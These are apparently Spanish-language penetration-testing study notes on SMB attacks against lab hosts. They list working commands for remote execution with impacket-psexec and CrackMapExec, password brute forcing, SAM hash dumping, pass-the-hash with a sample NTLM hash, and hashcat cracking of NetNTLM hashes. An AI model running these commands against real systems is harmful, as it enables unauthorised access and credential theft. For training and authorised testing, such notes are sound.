RCE:
PsExec nos permite ejecutar procesos en otros sitemas, completos con total interactividiad para aplicaciones de consola, sin tener que instalar software cliente manualmente.
<aside> 💡
. Toma este servicio y lo implementa en el recurso compartido admin$ (de forma predeterminada) en la máquina remota. Luego utiliza la interfaz DCE/RPC sobre SMB para acceder a la API de Windows Service Control Manager. A continuación, inicia el servicio PSExec en la máquina remota. El servicio PSExec crea entonces un llamada tuberÃa eso puede enviar comandos al sistema.
</aside>
https://github.com/fortra/impacket/blob/master/examples/psexec.py
Necesitamos proporcionar dominoi/nombredeusuario, contraseña direcciojnn ip de la vcitima
impacket-psexec
impacket-psexec user:pass@ip
https://github.com/fortra/impacket/blob/master/examples/smbexec.py
https://github.com/fortra/impacket/blob/master/examples/atexec.py:
https://github.com/byt3bl33d3r/CrackMapExec:
Fuerza bruta:
crackmapexec smb 10.129.23.113 -u jason -p passwords.list -d .
Comandos:
crackmapexec smb ip -u user -p pass -x 'comando' --exec-method smbexec
Enumerar usuarios iniciados
**$** crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Extraccion de hashes sam
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
Pass-the-hass: (PtH)
Si obtenemos un hash NTLM de usuario y si no podemos descifralro, aun podemos uar el hash para autenticarnos sobre smb
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
Tambien podemos abusar de smb creando un servidor smb falso para cpturar los hashes NetNTLM v1/v2 Res
Crackeando hash NTLM
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt